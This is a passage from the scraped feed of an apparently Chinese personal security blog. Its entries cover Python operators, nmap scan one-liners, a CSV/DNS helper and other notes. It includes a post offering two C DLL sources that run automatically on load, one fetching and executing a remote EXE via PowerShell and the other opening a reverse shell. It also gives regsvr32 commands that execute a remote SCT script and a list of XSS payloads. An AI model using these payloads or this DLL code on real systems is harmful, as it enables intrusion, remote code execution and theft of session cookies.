class="line">72</div><div class="line">73</div></pre></td><td class="code"><pre><div class="line">+</div><div class="line">加</div><div class="line">7+8 '7'+'8'</div><div class="line"></div><div class="line">-</div><div class="line">减 取相反数 9-7 -(-7)</div><div class="line"></div><div class="line">*</div><div class="line">乘 字符若干次 9*9 '9'*9</div><div class="line"></div><div class="line"></div><div class="line">/</div><div class="line">除</div><div class="line"></div><div class="line"></div><div class="line">**</div><div class="line">幂运算</div><div class="line">2**3 </div><div class="line"></div><div class="line"><</div><div class="line">小于 返回bool值 9<1</div><div class="line"></div><div class="line">></div><div class="line">大于 返回bool值 9>1</div><div class="line"></div><div class="line"></div><div class="line">!=</div><div class="line">不等于 返回bool值 9!=1</div><div class="line"></div><div class="line"></div><div class="line">//</div><div class="line">除法 求商整数 9//5</div><div class="line"></div><div class="line">%</div><div class="line">取余 9%5</div><div class="line"></div><div class="line"></div><div class="line">&</div><div class="line">按位与 7&8 =0 7&9 =1 00000111 00001000 得到 00000000 00000111 00001001 得到 00000001 二进制的每一位都进行and</div><div class="line"></div><div class="line">|</div><div class="line">按位或 7|8 =15 00000111 00001000 00001111 二进制的每一位都进行or</div><div class="line"></div><div class="line">^</div><div class="line">按位异或 每位不相同为1 相同为0 7^8 =15 00000111 00001000 00001111</div><div class="line"></div><div class="line"></div><div class="line">~</div><div class="line">翻转 ~x = -(x+1) ~8 = -9</div><div class="line"></div><div class="line"></div><div class="line">>></div><div class="line">右移 8 >>1 00001000 00000100 向右移动一位 除以2的n次幂</div><div class="line"></div><div class="line"></div><div class="line"><<</div><div class="line">左移 8 <<1 00001000 00010000 向左移动一位 乘以2的n次幂</div><div class="line"></div><div class="line"><=</div><div class="line">小于等于 8<=1 False</div><div class="line"></div><div class="line">>=</div><div class="line">大于等于 9>=1 True</div><div class="line"></div><div class="line">==</div><div class="line">相等 9 ==1 False</div><div class="line"></div><div class="line"></div><div class="line">not not True = False</div><div class="line"></div><div class="line">and True and False = False </div><div class="line"></div><div class="line">or True or False = True</div></pre></td></tr></table></figure>]]></content>
<tags>
<tag> python </tag>
</tags>
</entry>
<entry>
<title><![CDATA[NSA SMB dll code]]></title>
<url>http://phpplay.github.io/2017/04/20/NSA-SMB/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="这两天最火的是啥?方程式!"><a href="#这两天最火的是啥?方程式!" class="headerlink" title="这两天最火的是啥?方程式!"></a>这两天最火的是啥?方程式!</h2><pre><code>dll 源码
转眼就是5.20了,回头才发现一个月没写博客了,好浪费啊,没办法,最近太忙了
记录一下自己用的dll源码吧
</code></pre><p>其实也是网上抄的。。。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div></pre></td><td class="code"><pre><div class="line">// dllmain.cpp : 定义 DLL 应用程序的入口点。</div><div class="line">#include "stdafx.h"</div><div class="line">#include <windows.h></div><div class="line"></div><div class="line">void Fuck(void);</div><div class="line"></div><div class="line">BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved)</div><div class="line">{</div><div class="line"> switch (dwReason)</div><div class="line"> {</div><div class="line"> case DLL_PROCESS_ATTACH:</div><div class="line"> Fuck();</div><div class="line"> break;</div><div class="line"></div><div class="line"> case DLL_PROCESS_DETACH:</div><div class="line"></div><div class="line"> break;</div><div class="line"></div><div class="line"> case DLL_THREAD_ATTACH:</div><div class="line"></div><div class="line"> break;</div><div class="line"></div><div class="line"> case DLL_THREAD_DETACH:</div><div 
class="line"></div><div class="line"> break;</div><div class="line"> }</div><div class="line"> return TRUE;</div><div class="line">}</div><div class="line"></div><div class="line">void Fuck(void) </div><div class="line">{</div><div class="line"> </div><div class="line"> WinExec("cmd.exe /c powershell.exe -exec bypass -Command (New-Object Net.WebClient).DownloadFile('http://127.0.0.1/1.exe','C:\\Windows\\Temp\\temp.exe');C:\\Windows\\Temp\\temp.exe", SW_NORMAL);</div><div class="line"> //WinExec("net localgroup administrators admin /add", SW_NORMAL);</div><div class="line"> //WinExec("cmd.exe /c dir > c://result.txt", SW_NORMAL); </div><div class="line"> //WinExec("Cmd.exe /C md c://12", SW_HIDE);</div><div class="line"> </div><div class="line"></div><div class="line">}</div></pre></td></tr></table></figure></p>
<hr>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div 
class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div></pre></td><td class="code"><pre><div class="line">// dllmain.cpp : 定义 DLL 应用程序的入口点。</div><div class="line">#include "stdafx.h"</div><div class="line">#include <winsock2.h> </div><div class="line">#include <stdlib.h></div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line">#pragma comment(lib,"ws2_32")</div><div class="line">void reverse_shell();</div><div class="line">WSADATA wsaData;</div><div class="line">SOCKET Winsock;</div><div class="line">SOCKET Sock;</div><div class="line">struct sockaddr_in hax;</div><div class="line"></div><div class="line">STARTUPINFO ini_processo;</div><div class="line">PROCESS_INFORMATION processo_info;</div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line">BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved)</div><div class="line">{</div><div class="line"></div><div class="line"></div><div class="line"> switch (dwReason)</div><div class="line"> {</div><div class="line"> case DLL_PROCESS_ATTACH:</div><div class="line"> reverse_shell();</div><div class="line"> break;</div><div class="line"></div><div class="line"> case DLL_PROCESS_DETACH:</div><div class="line"></div><div class="line"> break;</div><div class="line"></div><div class="line"> case DLL_THREAD_ATTACH:</div><div class="line"></div><div class="line"> break;</div><div class="line"></div><div class="line"> case DLL_THREAD_DETACH:</div><div class="line"></div><div class="line"> break;</div><div class="line"> }</div><div class="line"> 
return TRUE;</div><div class="line">}</div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line">void reverse_shell()</div><div class="line">{</div><div class="line"> LPCSTR szMyUniqueNamedEvent = "sysnullevt";</div><div class="line"> HANDLE m_hEvent = CreateEventA(NULL, TRUE, FALSE, szMyUniqueNamedEvent);</div><div class="line"></div><div class="line"> switch (GetLastError())</div><div class="line"> {</div><div class="line"> // app is already running</div><div class="line"> case ERROR_ALREADY_EXISTS:</div><div class="line"> {</div><div class="line"> CloseHandle(m_hEvent);</div><div class="line"> break;</div><div class="line"> }</div><div class="line"></div><div class="line"> case ERROR_SUCCESS:</div><div class="line"> {</div><div class="line"></div><div class="line"> break;</div><div class="line"> }</div><div class="line"> }</div><div class="line"></div><div class="line"></div><div class="line"> WSAStartup(MAKEWORD(2, 2), &wsaData);</div><div class="line"> Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);</div><div class="line"></div><div class="line"> hax.sin_family = AF_INET;</div><div class="line"> //nc -lvvp 4431 本机nc监听</div><div class="line"></div><div class="line"> // 端口</div><div class="line"> hax.sin_port = htons(atoi("4431"));</div><div class="line"></div><div class="line"></div><div class="line"> //反弹ip</div><div class="line"> hax.sin_addr.s_addr = inet_addr("127.0.0.1");</div><div class="line"> WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);</div><div class="line"></div><div class="line"> memset(&ini_processo, 0, sizeof(ini_processo));</div><div class="line"> ini_processo.cb = sizeof(ini_processo);</div><div class="line"> ini_processo.dwFlags = STARTF_USESTDHANDLES;</div><div class="line"> ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;</div><div class="line"></div><div class="line"> 
CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, (LPSTARTUPINFOA)&ini_processo, &processo_info);</div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line">}</div></pre></td></tr></table></figure>]]></content>
<tags>
<tag> 网络安全 </tag>
</tags>
</entry>
<entry>
<title><![CDATA[nmap实用命令]]></title>
<url>http://phpplay.github.io/2017/04/13/nmap%E5%AE%9E%E7%94%A8%E5%91%BD%E4%BB%A4/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="nmap实用命令"><a href="#nmap实用命令" class="headerlink" title="nmap实用命令"></a>nmap实用命令</h2><p>自己总结了几条nmap的实用命令,主要是用来格式化输出,感觉不错,所以记录一下<br>几个参数<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">-sS 隐蔽扫描(半开syn)</div><div class="line">-sN 不管是否存在直接扫描</div><div class="line">-sI 完全隐藏。以一个跳板主机{无流量}扫描另一台主机</div></pre></td></tr></table></figure></p>
<p>最常用<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">nmap -v -sT -sV -Pn</div></pre></td></tr></table></figure></p>
<p>快速扫描<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">nmap -F 192.168.0.101</div></pre></td></tr></table></figure></p>
<p>syn快速扫描指定端口 格式化输出<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">nmap -p80 -PS80 -oG - 10.193.179.0/24 | awk '/open/{print $2}'</div><div class="line">10.193.179.9</div><div class="line">10.193.179.17</div><div class="line">10.193.179.29</div></pre></td></tr></table></figure></p>
<p>syn快速扫描指定端口 格式化输出带域名<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">nmap -p80 -PS80 -oG - 10.1.1.0/24 | awk '/open/{print $2 " " $3}'</div><div class="line"></div><div class="line">10.1.1.72 (userA.corp.foocompany.biz)</div><div class="line">10.1.1.73 (userB.corp.foocompany.biz)</div><div class="line">10.1.1.75 (userC.corp.foocompany.biz)</div></pre></td></tr></table></figure></p>
<p>指定端口扫描 格式化输出<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">nmap -vv -p 80,4848,7001,7002,7071,8000,8001,8002,8080,8081,8888,9999,9043,9080 10.193.179.0/24 | grep "Discovered open port" | awk {'print $6":"$4'} | awk -F/ {'print $1'} </div><div class="line"></div><div class="line">10.193.179.130:22</div><div class="line">10.193.179.130:22</div></pre></td></tr></table></figure></p>
<p>指定域名文件 格式化输出<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">nmap -vv -iL yuming.txt | grep "Discovered open port" | awk {'print $6":"$4'} | awk -F/ {'print $1'} > output.txt</div><div class="line"></div><div class="line">Warning: Hostname baidu.com resolves to 4 IPs. Using 111.13.101.208.</div><div class="line">Warning: Hostname www.baidu.com resolves to 2 IPs. Using 119.75.218.70.</div><div class="line">119.75.222.122:443</div><div class="line">119.75.218.70:443</div><div class="line">111.13.101.208:443</div><div class="line">119.75.222.122:80</div><div class="line">119.75.218.70:80</div><div class="line">111.13.101.208:80</div></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">从一款扫描器上扒下来的</div><div class="line"></div><div class="line">nmap -sS -T5 -PP -PE -PM -PI -PA20,53,80,113,443,5060,10043 --host-timeout=300m -O --max-rtt-timeout=3000ms --initial-rtt-timeout=1000ms --min-rtt-timeout=1000ms --max-retries=2 --stats-every 10s --traceroute --min-hostgroup=64 -PS1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,873,888,902,910,912,921,993,995,998,1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3389,3460,3500,3628,3632,3690,3780,3790,3817,4000,4322,4433,4444-4445,4659,4672,4679,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,6000,6050,6060,6070,6080,6101,6106,6112,6262,6379,6405,6502-6504,6542,6660-6661,6667,6905,6988,7000-7001,7021,7071,7080,7144,7181,7210,7272,7426,7443,7510,7579-7580,7700,7770,7777-7778,7787,7800-7801,7879,7902,8000-8001,8008,8014,8020,8023,8028,8030,8080-8082,8087,8090,8095,8161,8180,8205,8222,8300,8303,8333,8400,8443-8444,8503,8800,8812,8834,8880,8888-8890,8899,8901-8903,9000,9002,9010,9080-9081,9084,9090,9099-9100,9111,9152,9200,9390-9391,9495,9788,9809-9815,9855,9999-10001,10008,10050-10051,10080,10098,10162,10202-10203,10443,10616,10628,11000,11099,11211,11234,11333,12174,12203,12221,12345,12397,12401,13364,13500,13838,14330,15200,16102,17185,17200,18881,19300,19810,20010,2
0031,20034,20101,20111,20171,20222,22222,23472,23791,23943,25000,25025,26000,26122,27000,27017,27888,27960,28222,28784,30000,30718,31001,31099,32764,32913,34205,34443,37718,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48899,49152,50000-50004,50013,50500-50504,52302,55553,57772,62078,62514,65535 --min-rate=500 -PU46303 -p1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,873,888,902,910,912,921,993,995,998,1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3389,3460,3500,3628,3632,3690,3780,3790,3817,4000,4322,4433,4444-4445,4659,4672,4679,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,6000,6050,6060,6070,6080,6101,6106,6112,6262,6379,6405,6502-6504,6542,6660-6661,6667,6905,6988,7000-7001,7021,7071,7080,7144,7181,7210,7272,7426,7443,7510,7579-7580,7700,7770,7777-7778,7787,7800-7801,7879,7902,8000-8001,8008,8014,8020,8023,8028,8030,8080-8082,8087,8090,8095,8161,8180,8205,8222,8300,8303,8333,8400,8443-8444,8503,8800,8812,8834,8880,8888-8890,8899,8901-8903,9000,9002,9010,9080-9081,9084,9090,9099-9100,9111,9152,9200,9390-9391,9495,9788,9809-9815,9855,9999-10001,10008,10050-10051,10080,10098,10162,10202-10203,10443,10616,10628,11000,11099,11211,11234,11333,12174,12203,12221,12345,12397,12401,13364,13500,13838,14330,15200,16102,17185,17200,18881,19300,19810,20010,20031,20034,20101,20111,20171,20222,22222,23472,23791,23943,25000,25025,26000,26122,27000,27017,27888,27960,28222,28784,300
00,30718,31001,31099,32764,32913,34205,34443,37718,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48899,49152,50000-50004,50013,50500-50504,52302,55553,57772,62078,62514,65535 10.193.179.0/24</div></pre></td></tr></table></figure>
<p>http脚本扫描<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">nmap -sV -p 80 -T4 --script http*,default baidu.com</div></pre></td></tr></table></figure></p>
<p>nmap脚本列表<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line">auth: 负责处理鉴权证书(绕开鉴权)的脚本 </div><div class="line">broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务 </div><div class="line">brute: 提供暴力破解方式,针对常见的应用如http/snmp等 </div><div class="line">default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力 </div><div class="line">discovery: 对网络进行更多的信息收集,如SMB枚举、SNMP查询等 </div><div class="line">dos: 用于进行拒绝服务攻击 </div><div class="line">exploit: 利用已知的漏洞入侵系统 </div><div class="line">external: 利用第三方的数据库或资源,例如进行whois解析 </div><div class="line">fuzzer: 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞 </div><div class="line">intrusive: 入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽 </div><div class="line">malware: 探测目标机是否感染了病毒、开启了后门等信息 </div><div class="line">safe: 此类与intrusive相反,属于安全性脚本 </div><div class="line">version: 负责增强服务与版本扫描(Version Detection)功能的脚本 </div><div class="line">vuln: 负责检查目标机是否有常见的漏洞(Vulnerability),如是否有MS08_067</div></pre></td></tr></table></figure></p>
<p>参考链接<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">https://nmap.org/man/zh/</div><div class="line">http://gdd.gd/1159.html</div><div class="line">http://www.2cto.com/article/201203/125686.html</div><div class="line">http://www.vuln.cn/2444</div></pre></td></tr></table></figure></p>
]]></content>
<tags>
<tag> 网络安全 </tag>
<tag> nmap </tag>
</tags>
</entry>
<entry>
<title><![CDATA[c#2js]]></title>
<url>http://phpplay.github.io/2017/04/12/c-2js-1/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="c-2js"><a href="#c-2js" class="headerlink" title="c#2js"></a>c#2js</h2><p>今天无意看到subTee Fork 了一个DotNetToJScript的库,一下起了兴趣,看库名就是好东西,结果发现真的是个神器啊</p>
<p>然后看了subTee的blog,就研究了一下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">作用:将c# 转换为 js 调用底层api 运行shellcode ,简直不能再赞</div><div class="line"></div><div class="line">缺点:只能在clr v2 里使用</div></pre></td></tr></table></figure></p>
<p>DotNetToJScript 可以生成js,sct格式文件</p>
<p>不过几个参数我还没搞太懂,但也可以用了,英语太渣了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">-n 生成js</div><div class="line">-m 生成sct </div><div class="line">-u 生成sct 一般常用这个</div><div class="line">-o= 输出到一个文件</div><div class="line">-c= 指定类名</div><div class="line">-s= 使用附加脚本指定文件。创建实例(这一项不太懂)</div></pre></td></tr></table></figure>
<h2 id="test"><a href="#test" class="headerlink" title="test"></a>test</h2><p>我测试时只使用了几个命令<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">DotNetToJScript.exe -n xxx.dll >xxx.js 和</div><div class="line">DotNetToJScript.exe -u xxx.dll >xxx.sct</div><div class="line">wscript xxx.js</div><div class="line">regsvr32 /s /u /i:xxx.sct scrobj.dll</div></pre></td></tr></table></figure></p>
<h2 id="效果图"><a href="#效果图" class="headerlink" title="效果图"></a>效果图</h2><img src="/images/1.png" class="[1]">
<img src="/images/2.png" class="[2]">
<img src="/images/3.png" class="[3]">
<img src="/images/4.png" class="[4]">
<img src="/images/5.png" class="[5]">
<p>效果很好 感觉世界都美起来了,然后又复习了一下regsvr32的常用知识<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname</div><div class="line">/u - 解除服务器注册</div><div class="line">/s - 无声;不显示消息框</div><div class="line">/i - 调用 DllInstall,给其传递一个可选 [cmdline];跟/u一起使用时,卸载dll</div><div class="line">/n - 不要调用DllRegisterServer;这个选项必须跟/i一起使用</div></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">执行本地脚本</div><div class="line">regsvr32 /s /u /i:file.sct scrobj.dll</div><div class="line"></div><div class="line">执行远程脚本</div><div class="line">regsvr32 /s /n /u /i::http://127.0.0.1/2333.sct scrobj.dll</div></pre></td></tr></table></figure>
<h2 id="相关链接"><a href="#相关链接" class="headerlink" title="相关链接"></a>相关链接</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">https://gist.github.com/subTee/618d40aa4229581925eb9025429d8420</div><div class="line"></div><div class="line">http://subt0x10.blogspot.hk/2017/04/using-dotnettojscript-working-example.html</div><div class="line"></div><div class="line">https://github.com/tyranid/DotNetToJScript</div></pre></td></tr></table></figure>
]]></content>
<tags>
<tag> c# </tag>
<tag> javascript </tag>
</tags>
</entry>
<entry>
<title><![CDATA[csv]]></title>
<url>http://phpplay.github.io/2017/04/05/csv-test/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="csv生成"><a href="#csv生成" class="headerlink" title="csv生成"></a>csv生成</h2><p>放假回来后感觉好累,好适合学习,看到别人写的工具可以生成csv,所以就把自己的脚本也添加上试试。还有就是改进了域名验证的过程。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line">#save to csv </div><div class="line">def csvs(name,dic):</div><div class="line"> domainfile = name + '.csv'</div><div class="line"> dcsv = open(domainfile, 'wb+')</div><div class="line"> write_d = csv.writer(dcsv)</div><div class="line"> title = " ".join(['domain','ip']).decode("utf8").encode("gb2312").split() </div><div class="line"> write_d.writerow(title)</div><div class="line"> with dcsv as f:</div><div class="line"> for item in dic:</div><div class="line"> line = ','.join(item) + '\n'</div><div class="line"> f.write(line.encode('utf-8')) </div><div class="line"> dcsv.close()</div></pre></td></tr></table></figure>
<h2 id="domain2ip"><a href="#domain2ip" class="headerlink" title="domain2ip"></a>domain2ip</h2><p>写的很简单,就是用gethostbyname获取ip,速度很慢,需要改进一下,也许可以换用dnspython</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line">#domain to ip</div><div class="line">def domain2ip(domain):</div><div class="line"> list2 = []</div><div class="line"> for i in domain:</div><div class="line"> try:</div><div class="line"> result = socket.gethostbyname(i)</div><div class="line"> #print result</div><div class="line"> list2.append(result)</div><div class="line"> except:</div><div class="line"> list2.append('') </div><div class="line"> #print '0.0.0.0'</div><div class="line"> return list2</div></pre></td></tr></table></figure>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>dns查询速度过慢,导致返回过慢,多线程感觉又太卡,socket.gethostbyname阻塞太严重了,所以打算使用别的库来试试,或者直接在其它网站上查询,还需要改进很多<br>自己的python还是渣到不行,没有系统学习过,就是差距</p>
]]></content>
<tags>
<tag> python </tag>
</tags>
</entry>
<entry>
<title><![CDATA[xss常用payload]]></title>
<url>http://phpplay.github.io/2017/03/30/xss/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="xss"><a href="#xss" class="headerlink" title="xss"></a>xss</h2><p>前几天整理了下xss相关的东西,所以记录下常用的payload</p>
<h2 id="整理的payload"><a href="#整理的payload" class="headerlink" title="整理的payload"></a>整理的payload</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div 
class="line">71</div></pre></td><td class="code"><pre><div class="line"><img src=1></div><div class="line"></div><div class="line"><script>alert(1);</script></div><div class="line"></div><div class="line"><iframe width="100" height="100" src="http://baidu.com"></iframe></div><div class="line"></div><div class="line"><SCRIPT SRC=http://baidu.com/xss.js></SCRIPT></div><div class="line"></div><div class="line"><img src=x onerror=alert('t')> 单引号</div><div class="line"></div><div class="line"><img src="1" onerror="alert(1)"> 双引号</div><div class="line"></div><div class="line"><img src=1 onerror=alert(1);> 分号</div><div class="line"></div><div class="line"><img src=x onerror=alert(1)> </div><div class="line"></div><div class="line"><svg/onload=alert(1)></div><div class="line"></div><div class="line"><svg/onload=alert(1)>;</div><div class="line"></div><div class="line"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg> svg</div><div class="line"></div><div class="line"><input onfocus=write(1) autofocus> </div><div class="line"></div><div class="line"><input onfocus=alert(1) autofocus></div><div class="line"></div><div class="line"><video onerror=”javascript:alert(1)”><source></div><div class="line"></div><div class="line"><img src="pic.gif" onerror="alert('1')"</div><div class="line"></div><div class="line"><img src="pic.gif" onerror="alert('1')" alt="test" title="test1" onclick="alert('2')"></div><div class="line"></div><div class="line"><img src=x.jpg onerror=alert(document.cookie)></div><div class="line"></div><div class="line"><video><source 